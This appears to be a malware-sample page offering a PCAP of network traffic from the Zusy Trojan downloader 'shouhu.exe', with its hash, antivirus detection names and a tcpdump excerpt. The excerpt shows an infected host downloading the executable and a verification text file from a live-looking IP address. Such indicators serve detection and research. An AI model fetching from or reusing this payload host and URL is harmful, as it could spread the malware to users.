Zusy shouhu.exe Malware Trojan Downloader Dropper FULL PCAP FILE Download Traffic Sample

Download Attachments

  • 1 pcap shouhu
    Date added: November 3, 2016 1:07 am Added by: admin File size: 54 KB Downloads: 105
SHA256: 439f3181ca4d64c15041b0e011e5b1769f79e414b9ad78e26c42b39c2253b005
File name: shouhu.exe
Detection ratio: 31 / 56
Analysis date: 2016-11-03 00:43:25 UTC ( 0 minutes ago )
AegisLab Troj.W32.Sasfis.lqzi 20161102
AhnLab-V3 Malware/Win32.Generic.N2142312657 20161102
Antiy-AVL Trojan/Win32.TSGeneric 20161103
Arcabit Trojan.Zusy.D313F0 20161103
Avast Win32:Malware-gen 20161103
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9557 20161101
BitDefender Gen:Variant.Zusy.201712 20161103
Bkav W32.Clod32a.Trojan.2bca 20161102
Comodo Worm.Win32.Dropper.RA 20161102
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20161024
Cyren W32/Agent.EW.gen!Eldorado 20161102
Emsisoft Gen:Variant.Zusy.201712 (B) 20161102
F-Prot W32/Agent.EW.gen!Eldorado 20161102
F-Secure Trojan:W32/DelfInject.R 20161102
Fortinet Riskware/Qhost 20161102
GData Gen:Variant.Zusy.201712 20161102
Invincea trojan.win32.startpage.agm 20161018

2016-11-02 19:27:46.918199 IP 192.168.1.102.53070 > 42.51.155.153.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /yehuo/shouhu.exe?id=0.671988278308449 HTTP/1.1
E..a.6@…T….f*3…N.P.a.j..b.P…….GET /yehuo/shouhu.exe?id=0.671988278308449 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 42.51.155.153
Connection: Keep-Alive

2016-11-02 19:27:47.170302 IP 192.168.1.102.53070 > 42.51.155.153.80: Flags [.], ack 2921, win 256, length 0
E..(.7@…U….f*3…N.P.a….n/P…@p……..

E..(.m@…T….f*3…O.P…1….P…J………
2016-11-02 19:28:21.110880 IP 192.168.1.102.53071 > 42.51.155.153.80: Flags [P.], seq 0:434, ack 1, win 256, length 434: HTTP: GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.744495382322232 HTTP/1.1
E….n@…R….f*3…O.P…1….P…….GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.744495382322232 HTTP/1.1
Accept: */*
Referer: http://42.51.155.153/yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.744495382322232
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 42.51.155.153
Cache-Control: no-cache

2016-11-02 19:28:21.419292 IP 192.168.1.102.53071 > 42.51.155.153.80: Flags [.], ack 406, win 255, length 0

E..(.p@…T….f*3…N.P.a……P..,.P……..
2016-11-02 19:28:26.762109 IP 192.168.1.102.53071 > 42.51.155.153.80: Flags [P.], seq 434:868, ack 406, win 255, length 434: HTTP: GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662 HTTP/1.1
E….q@…R….f*3…O.P…….bP…….GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662 HTTP/1.1
Accept: */*
Referer: http://42.51.155.153/yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 42.51.155.153
Cache-Control: no-cache

2016-11-02 19:28:26.886586 IP 192.168.1.102.53071 > 42.51.155.153.80: Flags [.], ack 407, win 255, length 0

E..(.u@…T….f*3…P.P.Z.I….P………….
2016-11-02 19:28:27.159415 IP 192.168.1.102.53072 > 42.51.155.153.80: Flags [P.], seq 0:434, ack 1, win 256, length 434: HTTP: GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662 HTTP/1.1
E….v@…R….f*3…P.P.Z.I….P…`)..GET /yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662 HTTP/1.1
Accept: */*
Referer: http://42.51.155.153/yehuo/yanzheng/%E8%90%A5%E9%94%80%E8%BD%AF%E4%BB%B6%E9%AA%8C%E8%AF%81.txt?id=0.498024452336662
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 42.51.155.153

Leave a Reply